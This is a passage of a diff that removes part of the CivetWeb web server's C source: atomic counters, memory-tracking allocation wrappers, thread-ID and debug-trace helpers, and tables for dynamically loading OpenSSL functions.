-    && !defined(NO_ATOMICS)
-	ret = __sync_add_and_fetch(addr, 1);
-#else
-	mg_global_lock();
-	ret = (++(*addr));
-	mg_global_unlock();
-#endif
-	return ret;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-mg_atomic_dec(volatile int *addr)
-{
-	int ret;
-#if defined(_WIN32) && !defined(__SYMBIAN32__) && !defined(NO_ATOMICS)
-	/* Depending on the SDK, this function uses either
-	 * (volatile unsigned int *) or (volatile LONG *),
-	 * so whatever you use, the other SDK is likely to raise a warning. */
-	ret = InterlockedDecrement((volatile long *)addr);
-#elif defined(__GNUC__)                                                        \
-    && ((__GNUC__ > 4) || ((__GNUC__ == 4) && (__GNUC_MINOR__ > 0)))           \
-    && !defined(NO_ATOMICS)
-	ret = __sync_sub_and_fetch(addr, 1);
-#else
-	mg_global_lock();
-	ret = (--(*addr));
-	mg_global_unlock();
-#endif
-	return ret;
-}
-
-
-#if defined(USE_SERVER_STATS)
-static int64_t
-mg_atomic_add(volatile int64_t *addr, int64_t value)
-{
-	int64_t ret;
-#if defined(_WIN64) && !defined(__SYMBIAN32__) && !defined(NO_ATOMICS)
-	ret = InterlockedAdd64(addr, value);
-#elif defined(__GNUC__)                                                        \
-    && ((__GNUC__ > 4) || ((__GNUC__ == 4) && (__GNUC_MINOR__ > 0)))           \
-    && !defined(NO_ATOMICS)
-	ret = __sync_add_and_fetch(addr, value);
-#else
-	mg_global_lock();
-	*addr += value;
-	ret = (*addr);
-	mg_global_unlock();
-#endif
-	return ret;
-}
-#endif
-
-
-#if defined(__GNUC__)
-/* Show no warning in case system functions are not used. */
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic pop
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) */
-#if defined(__clang__)
-/* Show no warning in case system functions are not used. */
-#pragma clang diagnostic pop
-#endif
-
-
-#if defined(USE_SERVER_STATS)
-
-struct mg_memory_stat {
-	volatile int64_t totalMemUsed;
-	volatile int64_t maxMemUsed;
-	volatile int blockCount;
-};
-
-
-static struct mg_memory_stat *get_memory_stat(struct mg_context *ctx);
-
-
-static void *
-mg_malloc_ex(size_t size,
-             struct mg_context *ctx,
-             const char *file,
-             unsigned line)
-{
-	void *data = malloc(size + 2 * sizeof(uintptr_t));
-	void *memory = 0;
-	struct mg_memory_stat *mstat = get_memory_stat(ctx);
-
-#if defined(MEMORY_DEBUGGING)
-	char mallocStr[256];
-#else
-	(void)file;
-	(void)line;
-#endif
-
-	if (data) {
-		int64_t mmem = mg_atomic_add(&mstat->totalMemUsed, (int64_t)size);
-		if (mmem > mstat->maxMemUsed) {
-			/* could use atomic compare exchange, but this
-			 * seems overkill for statistics data */
-			mstat->maxMemUsed = mmem;
-		}
-
-		mg_atomic_inc(&mstat->blockCount);
-		((uintptr_t *)data)[0] = size;
-		((uintptr_t *)data)[1] = (uintptr_t)mstat;
-		memory = (void *)(((char *)data) + 2 * sizeof(uintptr_t));
-	}
-
-#if defined(MEMORY_DEBUGGING)
-	sprintf(mallocStr,
-	        "MEM: %p %5lu alloc   %7lu %4lu --- %s:%u\n",
-	        memory,
-	        (unsigned long)size,
-	        (unsigned long)mstat->totalMemUsed,
-	        (unsigned long)mstat->blockCount,
-	        file,
-	        line);
-#if defined(_WIN32)
-	OutputDebugStringA(mallocStr);
-#else
-	DEBUG_TRACE("%s", mallocStr);
-#endif
-#endif
-
-	return memory;
-}
-
-
-static void *
-mg_calloc_ex(size_t count,
-             size_t size,
-             struct mg_context *ctx,
-             const char *file,
-             unsigned line)
-{
-	void *data = mg_malloc_ex(size * count, ctx, file, line);
-
-	if (data) {
-		memset(data, 0, size * count);
-	}
-	return data;
-}
-
-
-static void
-mg_free_ex(void *memory, const char *file, unsigned line)
-{
-	void *data = (void *)(((char *)memory) - 2 * sizeof(uintptr_t));
-
-
-#if defined(MEMORY_DEBUGGING)
-	char mallocStr[256];
-#else
-	(void)file;
-	(void)line;
-#endif
-
-	if (memory) {
-		uintptr_t size = ((uintptr_t *)data)[0];
-		struct mg_memory_stat *mstat =
-		    (struct mg_memory_stat *)(((uintptr_t *)data)[1]);
-		mg_atomic_add(&mstat->totalMemUsed, -(int64_t)size);
-		mg_atomic_dec(&mstat->blockCount);
-#if defined(MEMORY_DEBUGGING)
-		sprintf(mallocStr,
-		        "MEM: %p %5lu free    %7lu %4lu --- %s:%u\n",
-		        memory,
-		        (unsigned long)size,
-		        (unsigned long)mstat->totalMemUsed,
-		        (unsigned long)mstat->blockCount,
-		        file,
-		        line);
-#if defined(_WIN32)
-		OutputDebugStringA(mallocStr);
-#else
-		DEBUG_TRACE("%s", mallocStr);
-#endif
-#endif
-		free(data);
-	}
-}
-
-
-static void *
-mg_realloc_ex(void *memory,
-              size_t newsize,
-              struct mg_context *ctx,
-              const char *file,
-              unsigned line)
-{
-	void *data;
-	void *_realloc;
-	uintptr_t oldsize;
-
-#if defined(MEMORY_DEBUGGING)
-	char mallocStr[256];
-#else
-	(void)file;
-	(void)line;
-#endif
-
-	if (newsize) {
-		if (memory) {
-			/* Reallocate existing block */
-			struct mg_memory_stat *mstat;
-			data = (void *)(((char *)memory) - 2 * sizeof(uintptr_t));
-			oldsize = ((uintptr_t *)data)[0];
-			mstat = (struct mg_memory_stat *)((uintptr_t *)data)[1];
-			_realloc = realloc(data, newsize + 2 * sizeof(uintptr_t));
-			if (_realloc) {
-				data = _realloc;
-				mg_atomic_add(&mstat->totalMemUsed, -(int64_t)oldsize);
-#if defined(MEMORY_DEBUGGING)
-				sprintf(mallocStr,
-				        "MEM: %p %5lu r-free  %7lu %4lu --- %s:%u\n",
-				        memory,
-				        (unsigned long)oldsize,
-				        (unsigned long)mstat->totalMemUsed,
-				        (unsigned long)mstat->blockCount,
-				        file,
-				        line);
-#if defined(_WIN32)
-				OutputDebugStringA(mallocStr);
-#else
-				DEBUG_TRACE("%s", mallocStr);
-#endif
-#endif
-				mg_atomic_add(&mstat->totalMemUsed, (int64_t)newsize);
-#if defined(MEMORY_DEBUGGING)
-				sprintf(mallocStr,
-				        "MEM: %p %5lu r-alloc %7lu %4lu --- %s:%u\n",
-				        memory,
-				        (unsigned long)newsize,
-				        (unsigned long)mstat->totalMemUsed,
-				        (unsigned long)mstat->blockCount,
-				        file,
-				        line);
-#if defined(_WIN32)
-				OutputDebugStringA(mallocStr);
-#else
-				DEBUG_TRACE("%s", mallocStr);
-#endif
-#endif
-				*(uintptr_t *)data = newsize;
-				data = (void *)(((char *)data) + 2 * sizeof(uintptr_t));
-			} else {
-#if defined(MEMORY_DEBUGGING)
-#if defined(_WIN32)
-				OutputDebugStringA("MEM: realloc failed\n");
-#else
-				DEBUG_TRACE("%s", "MEM: realloc failed\n");
-#endif
-#endif
-				return _realloc;
-			}
-		} else {
-			/* Allocate new block */
-			data = mg_malloc_ex(newsize, ctx, file, line);
-		}
-	} else {
-		/* Free existing block */
-		data = 0;
-		mg_free_ex(memory, file, line);
-	}
-
-	return data;
-}
-
-#define mg_malloc(a) mg_malloc_ex(a, NULL, __FILE__, __LINE__)
-#define mg_calloc(a, b) mg_calloc_ex(a, b, NULL, __FILE__, __LINE__)
-#define mg_realloc(a, b) mg_realloc_ex(a, b, NULL, __FILE__, __LINE__)
-#define mg_free(a) mg_free_ex(a, __FILE__, __LINE__)
-
-#define mg_malloc_ctx(a, c) mg_malloc_ex(a, c, __FILE__, __LINE__)
-#define mg_calloc_ctx(a, b, c) mg_calloc_ex(a, b, c, __FILE__, __LINE__)
-#define mg_realloc_ctx(a, b, c) mg_realloc_ex(a, b, c, __FILE__, __LINE__)
-
-#else /* USE_SERVER_STATS */
-
-static __inline void *
-mg_malloc(size_t a)
-{
-	return malloc(a);
-}
-
-static __inline void *
-mg_calloc(size_t a, size_t b)
-{
-	return calloc(a, b);
-}
-
-static __inline void *
-mg_realloc(void *a, size_t b)
-{
-	return realloc(a, b);
-}
-
-static __inline void
-mg_free(void *a)
-{
-	free(a);
-}
-
-#define mg_malloc_ctx(a, c) mg_malloc(a)
-#define mg_calloc_ctx(a, b, c) mg_calloc(a, b)
-#define mg_realloc_ctx(a, b, c) mg_realloc(a, b)
-#define mg_free_ctx(a, c) mg_free(a)
-
-#endif /* USE_SERVER_STATS */
-
-
-static void mg_vsnprintf(const struct mg_connection *conn,
-                         int *truncated,
-                         char *buf,
-                         size_t buflen,
-                         const char *fmt,
-                         va_list ap);
-
-static void mg_snprintf(const struct mg_connection *conn,
-                        int *truncated,
-                        char *buf,
-                        size_t buflen,
-                        PRINTF_FORMAT_STRING(const char *fmt),
-                        ...) PRINTF_ARGS(5, 6);
-
-/* This following lines are just meant as a reminder to use the mg-functions
- * for memory management */
-#ifdef malloc
-#undef malloc
-#endif
-#ifdef calloc
-#undef calloc
-#endif
-#ifdef realloc
-#undef realloc
-#endif
-#ifdef free
-#undef free
-#endif
-#ifdef snprintf
-#undef snprintf
-#endif
-#ifdef vsnprintf
-#undef vsnprintf
-#endif
-#define malloc DO_NOT_USE_THIS_FUNCTION__USE_mg_malloc
-#define calloc DO_NOT_USE_THIS_FUNCTION__USE_mg_calloc
-#define realloc DO_NOT_USE_THIS_FUNCTION__USE_mg_realloc
-#define free DO_NOT_USE_THIS_FUNCTION__USE_mg_free
-#define snprintf DO_NOT_USE_THIS_FUNCTION__USE_mg_snprintf
-#ifdef _WIN32 /* vsnprintf must not be used in any system, * \ \ \             \
-               * but this define only works well for Windows. */
-#define vsnprintf DO_NOT_USE_THIS_FUNCTION__USE_mg_vsnprintf
-#endif
-
-
-/* mg_init_library counter */
-static int mg_init_library_called = 0;
-
-#if !defined(NO_SSL)
-static int mg_ssl_initialized = 0;
-#endif
-
-static pthread_key_t sTlsKey; /* Thread local storage index */
-static int thread_idx_max = 0;
-
-
-struct mg_workerTLS {
-	int is_master;
-	unsigned long thread_idx;
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	HANDLE pthread_cond_helper_mutex;
-	struct mg_workerTLS *next_waiting_thread;
-#endif
-};
-
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) || defined(__MINGW32__) */
-#if defined(__clang__)
-/* Show no warning in case system functions are not used. */
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunused-function"
-#endif
-
-
-/* Get a unique thread ID as unsigned long, independent from the data type
- * of thread IDs defined by the operating system API.
- * If two calls to mg_current_thread_id  return the same value, they calls
- * are done from the same thread. If they return different values, they are
- * done from different threads. (Provided this function is used in the same
- * process context and threads are not repeatedly created and deleted, but
- * CivetWeb does not do that).
- * This function must match the signature required for SSL id callbacks:
- * CRYPTO_set_id_callback
- */
-FUNCTION_MAY_BE_UNUSED
-static unsigned long
-mg_current_thread_id(void)
-{
-#ifdef _WIN32
-	return GetCurrentThreadId();
-#else
-
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunreachable-code"
-/* For every compiler, either "sizeof(pthread_t) > sizeof(unsigned long)"
- * or not, so one of the two conditions will be unreachable by construction.
- * Unfortunately the C standard does not define a way to check this at
- * compile time, since the #if preprocessor conditions can not use the sizeof
- * operator as an argument. */
-#endif
-
-	if (sizeof(pthread_t) > sizeof(unsigned long)) {
-		/* This is the problematic case for CRYPTO_set_id_callback:
-		 * The OS pthread_t can not be cast to unsigned long. */
-		struct mg_workerTLS *tls =
-		    (struct mg_workerTLS *)pthread_getspecific(sTlsKey);
-		if (tls == NULL) {
-			/* SSL called from an unknown thread: Create some thread index.
-			 */
-			tls = (struct mg_workerTLS *)mg_malloc(sizeof(struct mg_workerTLS));
-			tls->is_master = -2; /* -2 means "3rd party thread" */
-			tls->thread_idx = (unsigned)mg_atomic_inc(&thread_idx_max);
-			pthread_setspecific(sTlsKey, tls);
-		}
-		return tls->thread_idx;
-	} else {
-		/* pthread_t may be any data type, so a simple cast to unsigned long
-		 * can rise a warning/error, depending on the platform.
-		 * Here memcpy is used as an anything-to-anything cast. */
-		unsigned long ret = 0;
-		pthread_t t = pthread_self();
-		memcpy(&ret, &t, sizeof(pthread_t));
-		return ret;
-	}
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-#endif
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static uint64_t
-mg_get_current_time_ns(void)
-{
-	struct timespec tsnow;
-	clock_gettime(CLOCK_REALTIME, &tsnow);
-	return (((uint64_t)tsnow.tv_sec) * 1000000000) + (uint64_t)tsnow.tv_nsec;
-}
-
-
-#if defined(__GNUC__)
-/* Show no warning in case system functions are not used. */
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic pop
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) */
-#if defined(__clang__)
-/* Show no warning in case system functions are not used. */
-#pragma clang diagnostic pop
-#endif
-
-
-#if !defined(DEBUG_TRACE)
-#if defined(DEBUG)
-static void DEBUG_TRACE_FUNC(const char *func,
-                             unsigned line,
-                             PRINTF_FORMAT_STRING(const char *fmt),
-                             ...) PRINTF_ARGS(3, 4);
-
-static void
-DEBUG_TRACE_FUNC(const char *func, unsigned line, const char *fmt, ...)
-{
-	va_list args;
-	uint64_t nsnow;
-	static uint64_t nslast;
-	struct timespec tsnow;
-
-	/* Get some operating system independent thread id */
-	unsigned long thread_id = mg_current_thread_id();
-
-	clock_gettime(CLOCK_REALTIME, &tsnow);
-	nsnow = ((uint64_t)tsnow.tv_sec) * ((uint64_t)1000000000)
-	        + ((uint64_t)tsnow.tv_nsec);
-
-	if (!nslast) {
-		nslast = nsnow;
-	}
-
-	flockfile(stdout);
-	printf("*** %lu.%09lu %12" INT64_FMT " %lu %s:%u: ",
-	       (unsigned long)tsnow.tv_sec,
-	       (unsigned long)tsnow.tv_nsec,
-	       nsnow - nslast,
-	       thread_id,
-	       func,
-	       line);
-	va_start(args, fmt);
-	vprintf(fmt, args);
-	va_end(args);
-	putchar('\n');
-	fflush(stdout);
-	funlockfile(stdout);
-	nslast = nsnow;
-}
-
-#define DEBUG_TRACE(fmt, ...)                                                  \
-	DEBUG_TRACE_FUNC(__func__, __LINE__, fmt, __VA_ARGS__)
-
-#else
-#define DEBUG_TRACE(fmt, ...)                                                  \
-	do {                                                                       \
-	} while (0)
-#endif /* DEBUG */
-#endif /* DEBUG_TRACE */
-
-
-#define MD5_STATIC static
-#include "md5.inl"
-
-/* Darwin prior to 7.0 and Win32 do not have socklen_t */
-#ifdef NO_SOCKLEN_T
-typedef int socklen_t;
-#endif /* NO_SOCKLEN_T */
-#define _DARWIN_UNLIMITED_SELECT
-
-#define IP_ADDR_STR_LEN (50) /* IPv6 hex string is 46 chars */
-
-#if !defined(MSG_NOSIGNAL)
-#define MSG_NOSIGNAL (0)
-#endif
-
-#if !defined(SOMAXCONN)
-#define SOMAXCONN (100)
-#endif
-
-/* Size of the accepted socket queue */
-#if !defined(MGSQLEN)
-#define MGSQLEN (20)
-#endif
-
-
-#if defined(NO_SSL)
-typedef struct SSL SSL; /* dummy for SSL argument to push/pull */
-typedef struct SSL_CTX SSL_CTX;
-#else
-#if defined(NO_SSL_DL)
-#include <openssl/ssl.h>
-#include <openssl/err.h>
-#include <openssl/crypto.h>
-#include <openssl/x509.h>
-#include <openssl/pem.h>
-#include <openssl/engine.h>
-#include <openssl/conf.h>
-#include <openssl/dh.h>
-#include <openssl/bn.h>
-#include <openssl/opensslv.h>
-#else
-
-/* SSL loaded dynamically from DLL.
- * I put the prototypes here to be independent from OpenSSL source
- * installation. */
-
-typedef struct ssl_st SSL;
-typedef struct ssl_method_st SSL_METHOD;
-typedef struct ssl_ctx_st SSL_CTX;
-typedef struct x509_store_ctx_st X509_STORE_CTX;
-typedef struct x509_name X509_NAME;
-typedef struct asn1_integer ASN1_INTEGER;
-typedef struct bignum BIGNUM;
-typedef struct ossl_init_settings_st OPENSSL_INIT_SETTINGS;
-typedef struct evp_md EVP_MD;
-typedef struct x509 X509;
-
-
-#define SSL_CTRL_OPTIONS (32)
-#define SSL_CTRL_CLEAR_OPTIONS (77)
-#define SSL_CTRL_SET_ECDH_AUTO (94)
-
-#define OPENSSL_INIT_NO_LOAD_SSL_STRINGS 0x00100000L
-#define OPENSSL_INIT_LOAD_SSL_STRINGS 0x00200000L
-#define OPENSSL_INIT_LOAD_CRYPTO_STRINGS 0x00000002L
-
-#define SSL_VERIFY_NONE (0)
-#define SSL_VERIFY_PEER (1)
-#define SSL_VERIFY_FAIL_IF_NO_PEER_CERT (2)
-#define SSL_VERIFY_CLIENT_ONCE (4)
-#define SSL_OP_ALL ((long)(0x80000BFFUL))
-#define SSL_OP_NO_SSLv2 (0x01000000L)
-#define SSL_OP_NO_SSLv3 (0x02000000L)
-#define SSL_OP_NO_TLSv1 (0x04000000L)
-#define SSL_OP_NO_TLSv1_2 (0x08000000L)
-#define SSL_OP_NO_TLSv1_1 (0x10000000L)
-#define SSL_OP_SINGLE_DH_USE (0x00100000L)
-#define SSL_OP_CIPHER_SERVER_PREFERENCE (0x00400000L)
-#define SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION (0x00010000L)
-#define SSL_OP_NO_COMPRESSION (0x00020000L)
-
-#define SSL_CB_HANDSHAKE_START (0x10)
-#define SSL_CB_HANDSHAKE_DONE (0x20)
-
-#define SSL_ERROR_NONE (0)
-#define SSL_ERROR_SSL (1)
-#define SSL_ERROR_WANT_READ (2)
-#define SSL_ERROR_WANT_WRITE (3)
-#define SSL_ERROR_WANT_X509_LOOKUP (4)
-#define SSL_ERROR_SYSCALL (5) /* see errno */
-#define SSL_ERROR_ZERO_RETURN (6)
-#define SSL_ERROR_WANT_CONNECT (7)
-#define SSL_ERROR_WANT_ACCEPT (8)
-
-
-struct ssl_func {
-	const char *name;  /* SSL function name */
-	void (*ptr)(void); /* Function pointer */
-};
-
-
-#ifdef OPENSSL_API_1_1
-
-#define SSL_free (*(void (*)(SSL *))ssl_sw[0].ptr)
-#define SSL_accept (*(int (*)(SSL *))ssl_sw[1].ptr)
-#define SSL_connect (*(int (*)(SSL *))ssl_sw[2].ptr)
-#define SSL_read (*(int (*)(SSL *, void *, int))ssl_sw[3].ptr)
-#define SSL_write (*(int (*)(SSL *, const void *, int))ssl_sw[4].ptr)
-#define SSL_get_error (*(int (*)(SSL *, int))ssl_sw[5].ptr)
-#define SSL_set_fd (*(int (*)(SSL *, SOCKET))ssl_sw[6].ptr)
-#define SSL_new (*(SSL * (*)(SSL_CTX *))ssl_sw[7].ptr)
-#define SSL_CTX_new (*(SSL_CTX * (*)(SSL_METHOD *))ssl_sw[8].ptr)
-#define TLS_server_method (*(SSL_METHOD * (*)(void))ssl_sw[9].ptr)
-#define OPENSSL_init_ssl                                                       \
-	(*(int (*)(uint64_t opts,                                                  \
-	           const OPENSSL_INIT_SETTINGS *settings))ssl_sw[10].ptr)
-#define SSL_CTX_use_PrivateKey_file                                            \
-	(*(int (*)(SSL_CTX *, const char *, int))ssl_sw[11].ptr)
-#define SSL_CTX_use_certificate_file                                           \
-	(*(int (*)(SSL_CTX *, const char *, int))ssl_sw[12].ptr)
-#define SSL_CTX_set_default_passwd_cb                                          \
-	(*(void (*)(SSL_CTX *, mg_callback_t))ssl_sw[13].ptr)
-#define SSL_CTX_free (*(void (*)(SSL_CTX *))ssl_sw[14].ptr)
-#define SSL_CTX_use_certificate_chain_file                                     \
-	(*(int (*)(SSL_CTX *, const char *))ssl_sw[15].ptr)
-#define TLS_client_method (*(SSL_METHOD * (*)(void))ssl_sw[16].ptr)
-#define SSL_pending (*(int (*)(SSL *))ssl_sw[17].ptr)
-#define SSL_CTX_set_verify                                                     \
-	(*(void (*)(SSL_CTX *,                                                     \
-	            int,                                                           \
-	            int (*verify_callback)(int, X509_STORE_CTX *)))ssl_sw[18].ptr)
-#define SSL_shutdown (*(int (*)(SSL *))ssl_sw[19].ptr)
-#define SSL_CTX_load_verify_locations                                          \
-	(*(int (*)(SSL_CTX *, const char *, const char *))ssl_sw[20].ptr)
-#define SSL_CTX_set_default_verify_paths (*(int (*)(SSL_CTX *))ssl_sw[21].ptr)
-#define SSL_CTX_set_verify_depth (*(void (*)(SSL_CTX *, int))ssl_sw[22].ptr)
-#define SSL_get_peer_certificate (*(X509 * (*)(SSL *))ssl_sw[23].ptr)
-#define SSL_get_version (*(const char *(*)(SSL *))ssl_sw[24].ptr)
-#define SSL_get_current_cipher (*(SSL_CIPHER * (*)(SSL *))ssl_sw[25].ptr)
-#define SSL_CIPHER_get_name                                                    \
-	(*(const char *(*)(const SSL_CIPHER *))ssl_sw[26].ptr)
-#define SSL_CTX_check_private_key (*(int (*)(SSL_CTX *))ssl_sw[27].ptr)
-#define SSL_CTX_set_session_id_context                                         \
-	(*(int (*)(SSL_CTX *, const unsigned char *, unsigned int))ssl_sw[28].ptr)
-#define SSL_CTX_ctrl (*(long (*)(SSL_CTX *, int, long, void *))ssl_sw[29].ptr)
-#define SSL_CTX_set_cipher_list                                                \
-	(*(int (*)(SSL_CTX *, const char *))ssl_sw[30].ptr)
-#define SSL_CTX_set_options                                                    \
-	(*(unsigned long (*)(SSL_CTX *, unsigned long))ssl_sw[31].ptr)
-#define SSL_CTX_set_info_callback                                              \
-	(*(void (*)(SSL_CTX * ctx,                                                 \
-	            void (*callback)(SSL * s, int, int)))ssl_sw[32].ptr)
-#define SSL_get_ex_data (*(char *(*)(SSL *, int))ssl_sw[33].ptr)
-#define SSL_set_ex_data (*(void (*)(SSL *, int, char *))ssl_sw[34].ptr)
-
-#define SSL_CTX_clear_options(ctx, op)                                         \
-	SSL_CTX_ctrl((ctx), SSL_CTRL_CLEAR_OPTIONS, (op), NULL)
-#define SSL_CTX_set_ecdh_auto(ctx, onoff)                                      \
-	SSL_CTX_ctrl(ctx, SSL_CTRL_SET_ECDH_AUTO, onoff, NULL)
-
-#define X509_get_notBefore(x) ((x)->cert_info->validity->notBefore)
-#define X509_get_notAfter(x) ((x)->cert_info->validity->notAfter)
-
-#define SSL_set_app_data(s, arg) (SSL_set_ex_data(s, 0, (char *)arg))
-#define SSL_get_app_data(s) (SSL_get_ex_data(s, 0))
-
-#define ERR_get_error (*(unsigned long (*)(void))crypto_sw[0].ptr)
-#define ERR_error_string (*(char *(*)(unsigned long, char *))crypto_sw[1].ptr)
-#define ERR_remove_state (*(void (*)(unsigned long))crypto_sw[2].ptr)
-#define CONF_modules_unload (*(void (*)(int))crypto_sw[3].ptr)
-#define X509_free (*(void (*)(X509 *))crypto_sw[4].ptr)
-#define X509_get_subject_name (*(X509_NAME * (*)(X509 *))crypto_sw[5].ptr)
-#define X509_get_issuer_name (*(X509_NAME * (*)(X509 *))crypto_sw[6].ptr)
-#define X509_NAME_oneline                                                      \
-	(*(char *(*)(X509_NAME *, char *, int))crypto_sw[7].ptr)
-#define X509_get_serialNumber (*(ASN1_INTEGER * (*)(X509 *))crypto_sw[8].ptr)
-#define EVP_get_digestbyname                                                   \
-	(*(const EVP_MD *(*)(const char *))crypto_sw[9].ptr)
-#define EVP_Digest                                                             \
-	(*(int (*)(                                                                \
-	    const void *, size_t, void *, unsigned int *, const EVP_MD *, void *)) \
-	      crypto_sw[10].ptr)
-#define i2d_X509 (*(int (*)(X509 *, unsigned char **))crypto_sw[11].ptr)
-#define BN_bn2hex (*(char *(*)(const BIGNUM *a))crypto_sw[12].ptr)
-#define ASN1_INTEGER_to_BN                                                     \
-	(*(BIGNUM * (*)(const ASN1_INTEGER *ai, BIGNUM *bn))crypto_sw[13].ptr)
-#define BN_free (*(void (*)(const BIGNUM *a))crypto_sw[14].ptr)
-#define CRYPTO_free (*(void (*)(void *addr))crypto_sw[15].ptr)
-
-#define OPENSSL_free(a) CRYPTO_free(a)
-
-
-/* set_ssl_option() function updates this array.
- * It loads SSL library dynamically and changes NULLs to the actual addresses
- * of respective functions. The macros above (like SSL_connect()) are really
- * just calling these functions indirectly via the pointer. */
-static struct ssl_func ssl_sw[] = {{"SSL_free", NULL},
-                                   {"SSL_accept", NULL},
-                                   {"SSL_connect", NULL},
-                                   {"SSL_read", NULL},
-                                   {"SSL_write", NULL},
-                                   {"SSL_get_error", NULL},
-                                   {"SSL_set_fd", NULL},
-                                   {"SSL_new", NULL},
-                                   {"SSL_CTX_new", NULL},
-                                   {"TLS_server_method", NULL},
-                                   {"OPENSSL_init_ssl", NULL},
-                                   {"SSL_CTX_use_PrivateKey_file", NULL},
-                                   {"SSL_CTX_use_certificate_file", NULL},
-                                   {"SSL_CTX_set_default_passwd_cb", NULL},
-                                   {"SSL_CTX_free", NULL},
-                                   {"SSL_CTX_use_certificate_chain_file", NULL},
-                                   {"TLS_client_method", NULL},
-                                   {"SSL_pending", NULL},
-                                   {"SSL_CTX_set_verify", NULL},
-                                   {"SSL_shutdown", NULL},
-                                   {"SSL_CTX_load_verify_locations", NULL},
-                                   {"SSL_CTX_set_default_verify_paths", NULL},
-                                   {"SSL_CTX_set_verify_depth", NULL},
-                                   {"SSL_get_peer_certificate", NULL},
-                                   {"SSL_get_version", NULL},
-                                   {"SSL_get_current_cipher", NULL},
-                                   {"SSL_CIPHER_get_name", NULL},
-                                   {"SSL_CTX_check_private_key", NULL},
-                                   {"SSL_CTX_set_session_id_context", NULL},
-                                   {"SSL_CTX_ctrl", NULL},
-                                   {"SSL_CTX_set_cipher_list", NULL},
-                                   {"SSL_CTX_set_options", NULL},
-                                   {"SSL_CTX_set_info_callback", NULL},
-                                   {"SSL_get_ex_data", NULL},
-                                   {"SSL_set_ex_data", NULL},
-                                   {NULL, NULL}};
-
-
-/* Similar array as ssl_sw. These functions could be located in different
- * lib. */
-static struct ssl_func crypto_sw[] = {{"ERR_get_error", NULL},
-                                      {"ERR_error_string", NULL},
-                                      {"ERR_remove_state", NULL},
-                                      {"CONF_modules_unload", NULL},
-                                      {"X509_free", NULL},
-                                      {"X509_get_subject_name", NULL},
-                                      {"X509_get_issuer_name", NULL},
-                                      {"X509_NAME_oneline", NULL},
-                                      {"X509_get_serialNumber", NULL},
-                                      {"EVP_get_digestbyname", NULL},
-                                      {"EVP_Digest", NULL},
-                                      {"i2d_X509", NULL},
-                                      {"BN_bn2hex", NULL},
-                                      {"ASN1_INTEGER_to_BN", NULL},
-                                      {"BN_free", NULL},
-                                      {"CRYPTO_free", NULL},
-                                      {NULL, NULL}};
-#else
-
-#define SSL_free (*(void (*)(SSL *))ssl_sw[0].ptr)
-#define SSL_accept (*(int (*)(SSL *))ssl_sw[1].ptr)
-#define SSL_connect (*(int (*)(SSL *))ssl_sw[2].ptr)
-#define SSL_read (*(int (*)(SSL *, void *, int))ssl_sw[3].ptr)
-#define SSL_write (*(int (*)(SSL *, const void *, int))ssl_sw[4].ptr)
-#define SSL_get_error (*(int (*)(SSL *, int))ssl_sw[5].ptr)
-#define SSL_set_fd (*(int (*)(SSL *, SOCKET))ssl_sw[6].ptr)
-#define SSL_new (*(SSL * (*)(SSL_CTX *))ssl_sw[7].ptr)
-#define SSL_CTX_new (*(SSL_CTX * (*)(SSL_METHOD *))ssl_sw[8].ptr)
-#define SSLv23_server_method (*(SSL_METHOD * (*)(void))ssl_sw[9].ptr)
-#define SSL_library_init (*(int (*)(void))ssl_sw[10].ptr)
-#define SSL_CTX_use_PrivateKey_file                                            \
-	(*(int (*)(SSL_CTX *, const char *, int))ssl_sw[11].ptr)
-#define SSL_CTX_use_certificate_file                                           \
-	(*(int (*)(SSL_CTX *, const char *, int))ssl_sw[12].ptr)
-#define SSL_CTX_set_default_passwd_cb                                          \
-	(*(void (*)(SSL_CTX *, mg_callback_t))ssl_sw[13].ptr)
-#define SSL_CTX_free (*(void (*)(SSL_CTX *))ssl_sw[14].ptr)
-#define SSL_load_error_strings (*(void (*)(void))ssl_sw[15].ptr)
-#define SSL_CTX_use_certificate_chain_file                                     \
-	(*(int (*)(SSL_CTX *, const char *))ssl_sw[16].ptr)
-#define SSLv23_client_method (*(SSL_METHOD * (*)(void))ssl_sw[17].ptr)
-#define SSL_pending (*(int (*)(SSL *))ssl_sw[18].ptr)
-#define SSL_CTX_set_verify                                                     \
-	(*(void (*)(SSL_CTX *,                                                     \
-	            int,                                                           \
-	            int (*verify_callback)(int, X509_STORE_CTX *)))ssl_sw[19].ptr)
-#define SSL_shutdown (*(int (*)(SSL *))ssl_sw[20].ptr)
-#define SSL_CTX_load_verify_locations                                          \
-	(*(int (*)(SSL_CTX *, const char *, const char *))ssl_sw[21].ptr)
-#define SSL_CTX_set_default_verify_paths (*(int (*)(SSL_CTX *))ssl_sw[22].ptr)
-#define SSL_CTX_set_verify_depth (*(void (*)(SSL_CTX *, int))ssl_sw[23].ptr)
-#define SSL_get_peer_certificate (*(X509 * (*)(SSL *))ssl_sw[24].ptr)
-#define SSL_get_version (*(const char *(*)(SSL *))ssl_sw[25].ptr)
-#define SSL_get_current_cipher (*(SSL_CIPHER * (*)(SSL *))ssl_sw[26].ptr)
-#define SSL_CIPHER_get_name                                                    \
-	(*(const char *(*)(const SSL_CIPHER *))ssl_sw[27].ptr)
-#define SSL_CTX_check_private_key (*(int (*)(SSL_CTX *))ssl_sw[28].ptr)
-#define SSL_CTX_set_session_id_context                                         \
-	(*(int (*)(SSL_CTX *, const unsigned char *, unsigned int))ssl_sw[29].ptr)
-#define SSL_CTX_ctrl (*(long (*)(SSL_CTX *, int, long, void *))ssl_sw[30].ptr)
-#define SSL_CTX_set_cipher_list                                                \
-	(*(int (*)(SSL_CTX *, const char *))ssl_sw[31].ptr)
-#define SSL_CTX_set_info_callback                                              \
-	(*(void (*)(SSL_CTX * ctx,                                                 \
